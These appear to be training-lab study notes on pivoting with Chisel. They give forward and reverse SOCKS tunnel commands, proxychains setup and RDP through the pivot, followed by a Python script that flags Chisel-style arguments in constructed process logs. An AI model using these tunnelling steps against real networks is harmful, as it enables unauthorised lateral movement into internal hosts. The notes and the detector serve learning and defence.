  • https://github.com/jpillora/chisel
  • Written in Go. Uses HTTP to transport data, secured with SSH

Scenario - access internal host from attackbox by running Chisel on pivot

Workflow

  • Download chisel from GitHub
  • go build

Copy chisel binary to the pivot - scp chisel ubuntu@10.129.202.64:~/

Run chisel on pivot host - ./chisel server -v -p 1234 --socks5

  • Listen on port 1234
  • Forward every request to all networks accessible from the pivot host

Connect to the Chisel server (pivot) from Pwnbox - ./chisel client -v 10.129.202.64:1234 socks

  • Returns the listener port for the Pwnbox
  • If issues, use this chisel version - https://github.com/jpillora/chisel/releases/tag/v1.7.4

Modify proxychains - Add the above listener port to /etc/proxychains.conf

Execute commands - proxychains xfreerdp /u /v /p


Chisel Reverse Pivot

  • The server has to specify --reverse
  • The client has to specify R:socks - for reversed
  • The server will listen and accept connections, and they will be proxied through the client

Workflow:

Chisel server on PWNBox - sudo ./chisel server --reverse -v -p 1234 --socks5

Connecting the Chisel Client (pivot) to PWNbox - ./chisel client -v 10.10.14.17:1234 R:socks

  • Confirm proxychains has port number specified in client response
  • Execute commands on the PWNBox with proxychains
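
Detection view of both workflows: the binary can be renamed, but the argument shapes above (server with --socks5 or --reverse, client with a socks or R:socks remote) still show up in process-creation logs. The following is an added example, not part of the original notes or the chisel project; the function names classify and scan, the host names and the sample events are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation records (host, command line); not real logs.
SAMPLE_EVENTS = [
    ("pivot01", "./chisel server -v -p 1234 --socks5"),
    ("pivot01", "/tmp/updater client -v 10.10.14.17:1234 R:socks"),  # renamed binary
    ("attack01", "sudo ./chisel server --reverse -v -p 1234 --socks5"),
    ("web01", "/usr/sbin/nginx -g 'daemon off;'"),
    ("web01", "ssh -D 1080 ubuntu@10.129.202.64"),
]

# Remote specs such as "socks", "5000:socks" or "R:socks".
SOCKS_REMOTE = re.compile(r"^(R:)?([^:\s]+:)*socks$")


def classify(cmdline):
    """Label chisel-style SOCKS tunnel arguments; None if nothing matches."""
    try:
        args = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a truncated log field
        args = cmdline.split()
    if "server" in args:
        rest = args[args.index("server") + 1:]
        if "--reverse" in rest:
            return "server-reverse"
        if "--socks5" in rest:
            return "server-socks"
    if "client" in args:
        rest = args[args.index("client") + 1:]
        for arg in rest:
            match = SOCKS_REMOTE.match(arg)
            if match:
                return "client-reverse-socks" if match.group(1) else "client-socks"
    return None


def scan(events):
    """Return (host, label, cmdline) for every event that matches."""
    hits = []
    for host, cmdline in events:
        label = classify(cmdline)
        if label:
            hits.append((host, label, cmdline))
    return hits


if __name__ == "__main__":
    for host, label, cmdline in scan(SAMPLE_EVENTS):
        print(f"{host}\t{label}\t{cmdline}")
```

Argument matching is a heuristic: treat hits as leads to correlate with the listening port (1234 in these notes) rather than as verdicts.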